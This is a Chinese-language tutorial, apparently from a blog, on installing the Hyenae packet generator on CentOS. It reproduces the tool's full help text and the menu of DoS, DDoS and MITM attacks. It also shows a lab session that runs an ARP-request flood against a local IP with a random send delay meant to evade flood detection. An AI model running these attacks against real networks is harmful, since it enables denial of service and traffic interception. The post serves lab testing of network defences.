软件介绍:
Hyenae是一种高度灵活和平台独立的网络数据包发生器。它允许你复制水平低以太网攻击的情况(如MITM , DOS ,和的DDoS )揭示您的网络中潜在的安全漏洞。
实验环境:
vmware workstation 11
centos6.5的系统下
SecureCRT (ssh远程连接软件)
软件安装:
官网链接:
https://packetstormsecurity.com/files/download/93515/hyenae-0.35-2.tar.gz
解压
[root@Master ~]# tar zxvf hyenae-0.35-2.tar.gz
hyenae-0.35-2/
hyenae-0.35-2/aclocal.m4
hyenae-0.35-2/._ChangeLog
hyenae-0.35-2/ChangeLog
hyenae-0.35-2/config.h.in
hyenae-0.35-2/configure
hyenae-0.35-2/._configure.ac
。。。。。。
切换到解压目录
[root@Master ~]# cd hyenae-0.35-2
配置:
[root@Master hyenae-0.35-2]# ./configure
。。。。。。。
。
checking for eth_set in -ldnet... no
checking for eth_set in -ldumbnet... no
configure: error: Missing library: libdnet/libdumbnet
出现上面报错。
解决它:
[root@Master hyenae-0.35-2]# yum install -y libdnet*
安装完成以后再次进行配置
[root@Master hyenae-0.35-2]# ./configure
。。。。。。。
checking for pcap.h... yes
configure: creating ./config.status
config.status: creating Makefile
config.status: creating man/Makefile
config.status: creating src/Makefile
config.status: creating config.h
config.status: executing depfiles commands
可以看到配置成功了。
编译安装。
[root@Master hyenae-0.35-2]# make && make install
make all-recursive
make[1]: Entering directory `/root/hyenae-0.35-2'
Making all in man
make[2]: Entering directory `/root/hyenae-0.35-2/man'
make[2]: Nothing to be done for `all'.
make[2]: Leaving directory `/root/hyenae-0.35-2/man'
Making all in src
。。。。。
/usr/bin/install -c 'hyenaed' '/usr/local/bin/hyenaed'
make[2]: Nothing to be done for `install-data-am'.
make[2]: Leaving directory `/root/hyenae-0.35-2/src'
make[1]: Leaving directory `/root/hyenae-0.35-2/src'
make[1]: Entering directory `/root/hyenae-0.35-2'
make[2]: Entering directory `/root/hyenae-0.35-2'
make[2]: Nothing to be done for `install-exec-am'.
test -z "/usr/local/share/doc/hyenae" || /bin/mkdir -p "/usr/local/share/doc/hyenae"
/usr/bin/install -c -m 644 'HOWTO' '/usr/local/share/doc/hyenae/HOWTO'
/usr/bin/install -c -m 644 'README' '/usr/local/share/doc/hyenae/README'
/usr/bin/install -c -m 644 'LICENSE' '/usr/local/share/doc/hyenae/LICENSE'
make[2]: Leaving directory `/root/hyenae-0.35-2'
make[1]: Leaving directory `/root/hyenae-0.35-2'
出现上面的输出就 成功了。
hyena的帮助文档。
[root@Master hyenae-0.35-2]# hyenae --help
* Initializing
hyenae: invalid option -- '-'
usage: hyenae (Starts attack assistant...)
hyenae -l (Prints all available network interfaces and exits)
#打印所有可用的网络接口
hyenae -L (Prints all available attacks and exits)
#打印所有可用的攻击
hyenae -V (Prints version and exits)
#打印版本号
hyenae -a arp-reply
-i | -I [Network interface name | index]
-s [Src HW-Address]
-d [Dst HW-Address]
-S [Snd HW-Address]-[Snd IP-Address (IPv4 only)]
-D [Trg HW-Address]-[Trg IP-Address (IPv4 only)]
OPTIONAL:
-r | -R [remote daemon address (Single) | address file (Clustered)]
-c [Min packet count]
-C [Max packet count]
-e [Min send delay (ms)]
-E [Max send delay (ms)]
-u [Min attack duration (ms)]
-U [Max attack duration (ms)]
-m (Set to ignore MTU limit)
-N (Set for cold run)
hyenae -a arp-request
-i | -I [Network interface name | index]
-s [Src HW-Address]
-d [Dst HW-Address]
-S [Snd HW-Address]-[Snd IP-Address (IPv4 only)]
-D [Trg HW-Address]-[Trg IP-Address (IPv4 only)]
OPTIONAL:
-r | -R [remote daemon address (Single) | address file (Clustered)]
-c [Min packet count]
-C [Max packet count]
-e [Min send delay (ms)]
-E [Max send delay (ms)]
-u [Min attack duration (ms)]
-U [Max attack duration (ms)]
-m (Set to ignore MTU limit)
-N (Set for cold run)
hyenae -a pppoe-discover
-i | -I [Network interface name | index]
-s [Src HW-Address]
-d [Dst HW-Address]
OPTIONAL:
-o [PPPoE Discovery Code]
-q [PPPoE Session ID Offset]
-Q [PPPoE Session ID Incrementation Steps]
-p | -P [Random payload length | Payload file]
-r | -R [remote daemon address (Single) | address file (Clustered)]
-c [Min packet count]
-C [Max packet count]
-e [Min send delay (ms)]
-E [Max send delay (ms)]
-u [Min attack duration (ms)]
-U [Max attack duration (ms)]
-m (Set to ignore MTU limit)
-N (Set for cold run)
hyenae -a icmp-echo
-i | -I [Network interface name | index]
-s [Src HW-Address]-[Src IP-Address (IPv4 or IPv6)]
-d [Dst HW-Address]-[Dst IP-Address (IPv4 or IPv6)]
OPTIONAL:
-t [IP Time To Live (TTL)]
-p | -P [Random payload length | Payload file]
-r | -R [remote daemon address (Single) | address file (Clustered)]
-c [Min packet count]
-C [Max packet count]
-e [Min send delay (ms)]
-E [Max send delay (ms)]
-u [Min attack duration (ms)]
-U [Max attack duration (ms)]
-A [Assumed IP-Address version on random address strips]
-m (Set to ignore MTU limit)
-N (Set for cold run)
hyenae -a icmp-unreach-tcp
-i | -I [Network interface name | index]
-s [Src HW-Address]-[Src IP-Address (IPv4 only)]
-d [Dst HW-Address]-[Dst IP-Address (IPv4 only)]
-S [TCP Src HW-Address]-[TCP Src IP-Address (IPv4 only)]@[TCP Src Port]
-D [TCP Dst HW-Address]-[TCP Dst IP-Address (IPv4 only)]@[TCP Dst Port]
OPTIONAL:
-o [ICMP Message Code]
-t [IP Time To Live (TTL)]
-k [TCP Achnkowledgement Number]
-w [TCP Window Size]
-q [TCP Sequence Number Offset]
-Q [TCP Sequence Number Incrementation Steps]
-r | -R [remote daemon address (Single) | address file (Clustered)]
-c [Min packet count]
-C [Max packet count]
-e [Min send delay (ms)]
-E [Max send delay (ms)]
-u [Min attack duration (ms)]
-U [Max attack duration (ms)]
-m (Set to ignore MTU limit)
-N (Set for cold run)
hyenae -a tcp
-i | -I [Network interface name | index]
-s [Src HW-Address]-[Src IP-Address (IPv4 or IPv6)]@[Src Port]
-d [Dst HW-Address]-[Dst IP-Address (IPv4 or IPv6)]@[Dst Port]
-f [TCP-Flags]
OPTIONAL:
-t [IP Time To Live (TTL)]
-k [TCP Achnkowledgement Number]
-w [TCP Window Size]
-q [TCP Sequence Number Offset]
-Q [TCP Sequence Number Incrementation Steps]
-p | -P [Random payload length | Payload file]
-r | -R [remote daemon address (Single) | address file (Clustered)]
-c [Min packet count]
-C [Max packet count]
-e [Min send delay (ms)]
-E [Max send delay (ms)]
-u [Min attack duration (ms)]
-U [Max attack duration (ms)]
-A [Assumed IP-Address version on random address strips]
-m (Set to ignore MTU limit)
-N (Set for cold run)
hyenae -a udp
-i | -I [Network interface name | index]
-s [Src HW-Address]-[Src IP-Address (IPv4 or IPv6)]@[Src Port]
-d [Dst HW-Address]-[Dst IP-Address (IPv4 or IPv6)]@[Dst Port]
OPTIONAL:
-t [IP Time To Live (TTL)]
-p | -P [Random payload length | Payload file]
-r | -R [remote daemon address (Single) | address file (Clustered)]
-c [Min packet count]
-C [Max packet count]
-e [Min send delay (ms)]
-E [Max send delay (ms)]
-u [Min attack duration (ms)]
-U [Max attack duration (ms)]
-A [Assumed IP-Address version on random address strips]
-m (Set to ignore MTU limit)
-N (Set for cold run)
hyenae -a dns-query
-i | -I [Network interface name | index]
-s [Src HW-Address]-[Src IP-Address (IPv4 or IPv6)]
-d [Dst HW-Address]-[Dst IP-Address (IPv4 or IPv6)]
-y [DNS query pattern]
OPTIONAL:
-t [IP Time To Live (TTL)]
-p | -P [Random payload length | Payload file]
-r | -R [remote daemon address (Single) | address file (Clustered)]
-c [Min packet count]
-C [Max packet count]
-e [Min send delay (ms)]
-E [Max send delay (ms)]
-u [Min attack duration (ms)]
-U [Max attack duration (ms)]
-A [Assumed IP-Address version on random address strips]
-m (Set to ignore MTU limit)
-N (Set for cold run)
hyenae -a dhcp-discover
-i | -I [Network interface name | index]
-s [Src HW-Address]-[Src IP-Address (IPv4 only)]
-d [Dst HW-Address]-[Dst IP-Address (IPv4 only)]
OPTIONAL:
-t [IP Time To Live (TTL)]
-S [IP-Address (IPv4 only)]
-p | -P [Random payload length | Payload file]
-r | -R [remote daemon address (Single) | address file (Clustered)]
-c [Min packet count]
-C [Max packet count]
-e [Min send delay (ms)]
-E [Max send delay (ms)]
-u [Min attack duration (ms)]
-U [Max attack duration (ms)]
-m (Set to ignore MTU limit)
-N (Set for cold run)
hyenae -a dhcp-request
-i | -I [Network interface name | index]
-s [Src HW-Address]-[Src IP-Address (IPv4 only)]
-d [Dst HW-Address]-[Dst IP-Address (IPv4 only)]
-D [Req IP-Address (IPv4 only)]
OPTIONAL:
-t [IP Time To Live (TTL)]
-S [IP-Address (IPv4 only)]
-r | -R [remote daemon address (Single) | address file (Clustered)]
-c [Min packet count]
-C [Max packet count]
-e [Min send delay (ms)]
-E [Max send delay (ms)]
-u [Min attack duration (ms)]
-U [Max attack duration (ms)]
-m (Set to ignore MTU limit)
-N (Set for cold run)
hyenae -a dhcp-release
-i | -I [Network interface name | index]
-s [Src HW-Address]-[Src IP-Address (IPv4 only)]
-d [Dst HW-Address]-[Dst IP-Address (IPv4 only)]
-D [Srv IP-Address (IPv4 only)]
OPTIONAL:
-t [IP Time To Live (TTL)]
-p | -P [Random payload length | Payload file]
-r | -R [remote daemon address (Single) | address file (Clustered)]
-c [Min packet count]
-C [Max packet count]
-e [Min send delay (ms)]
-E [Max send delay (ms)]
-u [Min attack duration (ms)]
-U [Max attack duration (ms)]
-m (Set to ignore MTU limit)
-N (Set for cold run)
hyenae -a hsrp-hello
-i | -I [Network interface name | index]
-s [Src HW-Address]-[Src IP-Address (IPv4 only)]
-d [Virtual IP-Address (IPv4 only)]
-z [HSRP Priority]
OPTIONAL:
-o [HSRP State Code]
-t [IP Time To Live (TTL)]
-h [HSRP Auth. Data]
-g [HSRP Group Number]
-p | -P [Random payload length | Payload file]
-r | -R [remote daemon address (Single) | address file (Clustered)]
-c [Min packet count]
-C [Max packet count]
-e [Min send delay (ms)]
-E [Max send delay (ms)]
-u [Min attack duration (ms)]
-U [Max attack duration (ms)]
-m (Set to ignore MTU limit)
-N (Set for cold run)
hyenae -a hsrp-coup
-i | -I [Network interface name | index]
-s [Src HW-Address]-[Src IP-Address (IPv4 only)]
-d [Virtual IP-Address (IPv4 only)]
-z [HSRP Priority]
OPTIONAL:
-o [HSRP State Code]
-t [IP Time To Live (TTL)]
-h [HSRP Auth. Data]
-g [HSRP Group Number]
-p | -P [Random payload length | Payload file]
-r | -R [remote daemon address (Single) | address file (Clustered)]
-c [Min packet count]
-C [Max packet count]
-e [Min send delay (ms)]
-E [Max send delay (ms)]
-u [Min attack duration (ms)]
-U [Max attack duration (ms)]
-m (Set to ignore MTU limit)
-N (Set for cold run)
hyenae -a hsrp-resign
-i | -I [Network interface name | index]
-s [Src HW-Address]-[Src IP-Address (IPv4 only)]
-d [Virtual IP-Address (IPv4 only)]
-z [HSRP Priority]
OPTIONAL:
-o [HSRP State Code]
-t [IP Time To Live (TTL)]
-h [HSRP Auth. Data]
-g [HSRP Group Number]
-p | -P [Random payload length | Payload file]
-r | -R [remote daemon address (Single) | address file (Clustered)]
-c [Min packet count]
-C [Max packet count]
-e [Min send delay (ms)]
-E [Max send delay (ms)]
-u [Min attack duration (ms)]
-U [Max attack duration (ms)]
-m (Set to ignore MTU limit)
-N (Set for cold run)
简单的使用(交互式的情景下):
[root@Master hyenae-0.35-2]# hyenae
* Initializing
* Starting attack assistant
Select operation mode:
> 1. Local
> 2. Remote (Single Daemon)
> 3. Remote (Multiple Daemons)
Enter option [1-3]: 1
Select network interface:
> 1. eth1
> 2. usbmon1
> 3. usbmon2
> 4. any
> 5. lo
Enter option [1-5]: 1
Select IP version:
> 1. IPv4
> 2. IPv6
Enter option [1-3]: 1
Is packet route NAT-Free?
Say 'n' here if the target machine is on a
different subnet than you such as hosts on the internet.
Enter choice [y or n]: y
Is network EAP-Free?
Say 'n' here if the network you are on is using the
Extensible Authentication Protocol (EAP). This would be
the case if you are connected with a wireless network card.
Enter choice [y or n]: y
Select attack type:
> 1. ARP-Request flood DoS
> 2. ARP-Cache poisoning MITM
> 3. PPPoE session initiation flood DoS
> 4. Blind PPPoE session termination DoS
> 5. ICMPv4-Echo flood DoS
> 6. ICMPv4-Smurf attack DDoS
> 7. ICMPv4 based TCP-Connection reset DoS
> 8. TCP-SYN flood DoS
> 9. TCP-Land attack DoS
> 10. Blind TCP-Connection reset DoS
> 11. UDP flood DoS
> 12. DNS-Query flood DoS
> 13. DHCP-Discover flood DoS
> 14. DHCP starvation DoS
> 15. DHCP-Release forcing DoS
> 16. Cisco HSRP active router hijacking DoS
Enter option [1-16]: 1
Enter target pattern:
Pattern format:
[IP-Address]
For additional informations about address patterns
and wilcard based randomization see README or man pages.
> 192.168.0.26
Activate random send delay?
A random send delay can be usefull to break
flood detection mechanisms but will slow down
the packet rate of the attack.
Enter choice [y or n]: y
Attack usage:
hyenae -I 1 -a arp-request -A 4
-s % -d ff:ff:ff:ff:ff:ff
-S %-% -D ff:ff:ff:ff:ff:ff
-E 1000
Would you like to execute the attack now?
Enter choice [y or n]: y
* Opening network interface (eth1)
* Launching attack
Press any key to stop
* Finished: 83368 packets sent (3501456 bytes) in 15.409 seconds
You have new mail in /var/spool/mail/root
我们可以利用它模拟大量的网络流量,网上对于它的介绍比较少,我的能力也有限,所以只是简单的介绍了一下。希望大家能熟练的应用。